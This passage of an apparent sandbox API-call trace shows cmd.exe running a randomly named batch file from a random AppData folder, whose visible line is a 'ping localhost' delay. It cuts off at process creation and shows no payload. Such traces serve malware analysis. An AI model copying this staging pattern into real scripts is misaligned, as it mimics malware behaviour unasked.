lpData=0x1ceb18*=0x9, lpcbData=0x1ceb10*=0x4) returned 0x0 [0117.831] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceb14, lpData=0x1ceb18, lpcbData=0x1ceb10*=0x1000 | out: lpType=0x1ceb14*=0x0, lpData=0x1ceb18*=0x9, lpcbData=0x1ceb10*=0x1000) returned 0x2 [0117.831] RegCloseKey (hKey=0x40) returned 0x0 [0117.831] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635e [0117.832] srand (_Seed=0x5b88635e) [0117.832] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"" [0117.832] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd\"" [0117.832] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.832] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3419b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.832] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.832] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.832] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.832] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.832] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.832] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.832] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.832] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.832] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.832] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.832] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.832] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.833] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.833] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf8d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf8d8, lpFilePart=0x1cf8d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf8d4*="Desktop") returned 0x18 [0117.833] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.833] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf654 | out: lpFindFileData=0x1cf654) returned 0x33ffe0 [0117.833] FindClose (in: hFindFile=0x33ffe0 | out: hFindFile=0x33ffe0) returned 1 [0117.833] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf654 | out: lpFindFileData=0x1cf654) returned 0x33ffe0 [0117.833] FindClose (in: hFindFile=0x33ffe0 | out: hFindFile=0x33ffe0) returned 1 [0117.833] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf654 | out: lpFindFileData=0x1cf654) returned 0x33ffe0 [0117.833] FindClose (in: hFindFile=0x33ffe0 | out: hFindFile=0x33ffe0) returned 1 [0117.834] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.834] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.834] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.834] GetEnvironmentStringsW () returned 0x340150* [0117.834] FreeEnvironmentStringsW (penv=0x340150) returned 1 [0117.834] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.836] GetConsoleOutputCP () returned 0x1b5 [0117.836] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.836] GetUserDefaultLCID () returned 0x409 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfa18, cchData=128 | out: lpLCData="0") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfa18, cchData=128 | out: lpLCData="0") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfa18, cchData=128 | out: lpLCData="1") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.837] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.838] GetConsoleTitleW (in: lpConsoleTitle=0x3401e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.839] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.839] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0117.839] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0117.839] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0117.842] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", _String2=")") returned 58 [0117.842] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 3 [0117.842] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 3 [0117.842] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 6 [0117.842] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 6 [0117.842] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 15 [0117.842] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 15 [0117.843] GetConsoleTitleW (in: lpConsoleTitle=0x1cf710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.843] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf4cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf4c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf4c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0117.844] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0117.844] SetErrorMode (uMode=0x0) returned 0x0 [0117.844] SetErrorMode (uMode=0x1) returned 0x0 [0117.844] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x34dc08, lpFilePart=0x1cf230 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x1cf230*="vMfCCeRYkvQy") returned 0x2d [0117.844] SetErrorMode (uMode=0x0) returned 0x1 [0117.844] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0117.845] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.849] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.849] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", fInfoLevelId=0x1, lpFindFileData=0x1cefcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cefcc) returned 0x3408f0 [0117.849] FindClose (in: hFindFile=0x3408f0 | out: hFindFile=0x3408f0) returned 1 [0117.849] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0117.850] GetConsoleTitleW (in: lpConsoleTitle=0x1cf4a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.997] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0118.000] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0118.000] IdentifyCodeAuthzLevelW () returned 0x1 [0118.007] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0118.007] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0118.008] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0118.008] CloseCodeAuthzLevel () returned 0x1 [0118.008] SetErrorMode (uMode=0x0) returned 0x0 [0118.008] SetErrorMode (uMode=0x1) returned 0x0 [0118.008] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", nBufferLength=0x104, lpBuffer=0x3404e8, lpFilePart=0x1cf390 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", lpFilePart=0x1cf390*="p0mhdE5X.cmd") returned 0x3a [0118.008] SetErrorMode (uMode=0x0) returned 0x1 [0118.008] CmdBatNotification () returned 0x0 [0118.008] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0118.008] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0118.008] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.009] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.009] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.009] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.009] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x91, lpOverlapped=0x0) returned 1 [0118.009] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0118.009] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0118.010] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.010] GetFileType (hFile=0x58) returned 0x1 [0118.010] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.010] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0118.010] _wcsicmp (_String1="ping", _String2=")") returned 71 [0118.010] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0118.010] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0118.010] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0118.011] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0118.011] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0118.011] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0118.012] _tell (_FileHandle=3) returned 21 [0118.012] _close (_FileHandle=3) returned 0 [0118.012] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf18c | out: _Buffer="\r\n") returned 2 [0118.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.012] GetFileType (hFile=0x7) returned 0x2 [0118.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.013] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf14c | out: lpMode=0x1cf14c) returned 1 [0118.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.013] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf178, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf178*=0x2) returned 1 [0118.013] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0118.013] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0118.013] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf188 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0118.013] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1cf188 | out: _Buffer=">") returned 1 [0118.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.013] GetFileType (hFile=0x7) returned 0x2 [0118.014] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf150 | out: lpMode=0x1cf150) returned 1 [0118.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.014] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1cf17c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1cf17c*=0x19) returned 1 [0118.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.014] GetFileType (hFile=0x7) returned 0x2 [0118.014] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3d4 | out: lpMode=0x1cf3d4) returned 1 [0118.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.015] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x340958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x1cf400, lpReserved=0x0 | out: lpBuffer=0x340958*, lpNumberOfCharsWritten=0x1cf400*=0x4) returned 1 [0118.015] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1cf40c | out: _Buffer=" -n 3 localhost ") returned 16 [0118.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.015] GetFileType (hFile=0x7) returned 0x2 [0118.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.015] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3cc | out: lpMode=0x1cf3cc) returned 1 [0118.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.015] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1cf3f8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf3f8*=0x10) returned 1 [0118.016] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf42c | out: _Buffer="\r\n") returned 2 [0118.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.016] GetFileType (hFile=0x7) returned 0x2 [0118.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3ec | out: lpMode=0x1cf3ec) returned 1 [0118.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.016] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf418, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf418*=0x2) returned 1 [0118.016] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0118.016] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0118.017] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0118.017] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0118.017] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0118.017] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0118.017] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0118.017] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0118.017] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0118.017] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0118.017] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0118.017] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0118.017] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0118.017] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0118.017] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0118.017] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0118.018] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0118.018] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0118.018] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0118.018] _wcsicmp (_String1="ping", _String2="START") returned -3 [0118.018] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0118.018] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0118.018] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0118.018] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0118.018] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0118.018] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0118.018] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0118.018] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0118.018] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0118.018] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0118.019] SetErrorMode (uMode=0x0) returned 0x0 [0118.019] SetErrorMode (uMode=0x1) returned 0x0 [0118.019] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x350550, lpFilePart=0x1cf1d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf1d0*="Desktop") returned 0x18 [0118.019] SetErrorMode (uMode=0x0) returned 0x1 [0118.019] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.019] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.019] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0xffffffff [0118.020] GetLastError () returned 0x2 [0118.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0xffffffff [0118.020] GetLastError () returned 0x2 [0118.020] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0x350838 [0118.020] FindClose (in: hFindFile=0x350838 | out: hFindFile=0x350838) returned 1 [0118.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0xffffffff [0118.021] GetLastError () returned 0x2 [0118.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0x350838 [0118.021] FindClose (in: hFindFile=0x350838 | out: hFindFile=0x350838) returned 1 [0118.021] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.021] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.021] GetConsoleTitleW (in: lpConsoleTitle=0x1cef9c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.022] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.022] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.022] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.022] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0xffffffff [0118.022] GetLastError () returned 0x2 [0118.022] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0xffffffff [0118.022] GetLastError () returned 0x2 [0118.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0x350d80 [0118.023] FindClose (in: hFindFile=0x350d80 | out: hFindFile=0x350d80) returned 1 [0118.023] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0xffffffff [0118.023] GetLastError () returned 0x2 [0118.023] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0x350d80 [0118.023] FindClose (in: hFindFile=0x350d80 | out: hFindFile=0x350d80) returned 1 [0118.023] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.023] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.024] GetConsoleTitleW (in: lpConsoleTitle=0x1ced30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.024] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cebb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cec80 | out: lpAttributeList=0x1cebb8, lpSize=0x1cec80) returned 1 [0118.024] UpdateProcThreadAttribute (in: lpAttributeList=0x1cebb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cec78, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cebb8, lpPreviousValue=0x0) returned 1 [0118.024] GetStartupInfoW (in: lpStartupInfo=0x1ceb74 | out: lpStartupInfo=0x1ceb74*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", 